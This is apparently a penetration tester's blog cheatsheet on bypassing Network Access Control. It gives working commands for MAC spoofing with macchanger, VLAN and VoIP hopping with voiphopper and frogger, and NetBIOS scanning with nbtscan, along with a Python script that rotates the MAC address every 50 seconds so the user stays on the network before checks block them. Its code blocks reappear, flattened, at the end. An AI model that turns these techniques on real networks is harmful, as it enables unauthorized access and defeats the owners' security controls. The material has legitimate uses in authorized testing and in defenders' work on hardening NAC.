NAC Bypass Cheatsheet

This post lists down a few of the techniques which can be used to bypass Network Access Control solutions(NAC).

Pre-connect Scenario

In a pre-connect scenario decisions to grant access control rights are made before granting any access to the network resources.

Mac Spoofing It is possible to spoof the mac address of following devices and obtain network access.

Physical devices like old VOIP phone, Printers, cameras etc may not support 802.1x authentication and mac addresses assigned to these devices can be spoofed to obtain IP address.
Physical access to 802.1x authenticated VOIP phones, printer, etc may disclose mac and IP info from the network settings menu, stickers on the backside, etc.
Boot menu of certain workstations, laptops etc may disclose mac address.

macchanger

macchanger -m XX:XX:XX:XX:XX:XX

VOIP Hopping via CDP packets CDP protocol can be abused to hop the VLAN and obtain IP address.

Voiphopper tool can be used to execute this attack.

VOIPhopper Example

voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L   'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1

VLAN Hopping via DTP Packets It is possible to hop vlans by abusing DTP protocol. Frogger can be used to execute such attacks.

root@kali:/opt/# git clone https://github.com/nccgroup/vlan-hopping
root@kali:/opt# cd vlan-hopping/
root@kali:/opt/vlan-hopping# ls
frogger.sh  LICENSE  README.md
root@kali:/opt/vlan-hopping# ./frogger.sh

Pre-authenticated device Pre-authenticated devices can be used to bypass NAC solutions . In this situation an attacker will place a rogue device such as a raspberry pi between supplicant and authentication server. The traffic will then flow through the rogue device placed by the attacker.

Physical access to the network switch Obtaining physical access to the network switch and changing the configuration is one of the toughest but foolproof way of bypassing NAC solutions 🤢.
Probe Request Fire up wireshark and check for MAC addresses in probe request. Try spoofing the MAC gathered from probe request.

Post-Connect Scenario

In a post-connect scenario you are allowed to the network for a small period of time and a set of checks are ran against your endpoint. If the endpoint fails to meet the requirements, it will be disallowed to use any resource further.

Mac randomization As mentioned before in a post-connect scenario, it is possible to use the network resources for a small period of time while a requirement check is done. In this situation an attacker can change his MAC address to attain a new IP address prior to getting blocked and continue using the network resources. Below is a small python script which I made to automate this.

randommac.py

#!/usr/bin/python
import subprocess
import sys
import threading
import time



class MyThread (threading.Thread):
    die = False
    def __init__(self, name):
        threading.Thread.__init__(self)
        

    def run(self):
        while not self.die:
            print "changing MAC Adress \n\n" + (time.ctime())
            subprocess.call(["sudo","ifconfig","eth0","down"]) # change interface if required
            subprocess.call(["sudo","macchanger","-A","eth0"]) # change interface if required
            subprocess.call(["sudo","ifconfig","eth0","up"]) # change interface if required
            print "MAC Changed\n"
            time.sleep(50) # mac adress will change in 50 seconds. 

    def join(self):
        self.die = True
        print "bye"
        sys.exit(1)

if __name__ == '__main__':
    f = MyThread('first')
    f.start()
    try:
        while True:
            time.sleep(2)
    except KeyboardInterrupt:
           f.join()

UDP Filtering Sometimes NAC solutions will only disallow TCP connections but UDP connections would still be allowed and an attacker can leverage this to conduct NETBIOS scan in order to obtain IP and MAC addresses.

NBTSCAN

root@kali:~/Desktop# nbtscan 192.168.112.xx
Doing NBT name scan for addresses from 192.168.112.xx

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.112.xx    xxx              xx        xx            00:00:00:xx:xx:xx

Captive Portal Bypass
Here is great post on bypassing captive portals. Kudos to 0KATZ for this blog post.

Something missing here? Reach me @noob_pikachu

PreviousCertified Red Team Professional

Last updated 5 years ago

root@kali:/opt/# git clone https://github.com/nccgroup/vlan-hopping root@kali:/opt# cd vlan-hopping/ root@kali:/opt/vlan-hopping# ls frogger.sh LICENSE README.md root@kali:/opt/vlan-hopping# ./frogger.sh

#!/usr/bin/python import subprocess import sys import threading import time class MyThread (threading.Thread): die = False def __init__(self, name): threading.Thread.__init__(self) def run(self): while not self.die: print "changing MAC Adress \n\n" + (time.ctime()) subprocess.call(["sudo","ifconfig","eth0","down"]) # change interface if required subprocess.call(["sudo","macchanger","-A","eth0"]) # change interface if required subprocess.call(["sudo","ifconfig","eth0","up"]) # change interface if required print "MAC Changed\n" time.sleep(50) # mac adress will change in 50 seconds. def join(self): self.die = True print "bye" sys.exit(1) if __name__ == '__main__': f = MyThread('first') f.start() try: while True: time.sleep(2) except KeyboardInterrupt: f.join()

root@kali:~/Desktop# nbtscan 192.168.112.xx Doing NBT name scan for addresses from 192.168.112.xx IP address NetBIOS Name Server User MAC address ------------------------------------------------------------------------------ 192.168.112.xx xxx xx xx 00:00:00:xx:xx:xx